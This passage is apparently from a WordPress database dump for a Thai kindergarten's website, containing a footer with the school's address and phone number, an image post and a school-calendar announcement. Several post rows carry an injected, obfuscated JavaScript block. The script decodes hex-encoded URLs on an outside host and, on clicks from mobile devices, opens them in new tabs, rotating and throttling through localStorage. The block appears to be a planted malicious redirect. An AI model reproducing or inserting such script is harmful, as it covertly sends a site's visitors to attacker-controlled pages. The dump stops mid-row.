{\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-09-24 11:50:55','2024-09-24 04:50:55','',19,'http://watprato.ssk.in.th/?p=439',0,'revision','',0),
(441,2,'2024-09-25 10:04:23','2024-09-25 03:04:23','<!-- wp:generateblocks/image {\"uniqueId\":\"bf9fc251\",\"mediaId\":442,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bf9fc251\"><img class=\"gb-image gb-image-bf9fc251\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/461169913_122179718960202781_2068683679490867629_n.jpg\" alt=\"\" title=\"461169913_122179718960202781_2068683679490867629_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ประกาศโรงเรียนอนุบาลวัดพระโต แจ้งปฏิทินการศึกษาประกาศโรงเรียนอนุบาลวัดพระโต ภาคเรียนที่ 1 ปีการศึกษา 2567ประกาศโรงเรียนอนุบาลวัดพระโต แจ้งปฏิทินการศึกษาประกาศโรงเรียนอนุบาลวัดพระโต','','publish','open','open','','%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1','','','2024-09-25 10:06:26','2024-09-25 03:06:26','',0,'http://watprato.ssk.in.th/?p=441',0,'post','',0),
(442,2,'2024-09-25 10:03:54','2024-09-25 03:03:54','','461169913_122179718960202781_2068683679490867629_n','','inherit','open','closed','','461169913_122179718960202781_2068683679490867629_n','','','2024-09-25 10:03:54','2024-09-25 03:03:54','',441,'http://watprato.ssk.in.th/wp-content/uploads/2024/09/461169913_122179718960202781_2068683679490867629_n.jpg',0,'attachment','image/jpeg',0),
(443,2,'2024-09-25 10:04:23','2024-09-25 03:04:23','<!-- wp:generateblocks/image {\"uniqueId\":\"bf9fc251\",\"mediaId\":442,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-bf9fc251\"><img class=\"gb-image gb-image-bf9fc251\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/461169913_122179718960202781_2068683679490867629_n.jpg\" alt=\"\" title=\"461169913_122179718960202781_2068683679490867629_n\"/></figure>\n<!-- /wp:generateblocks/image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 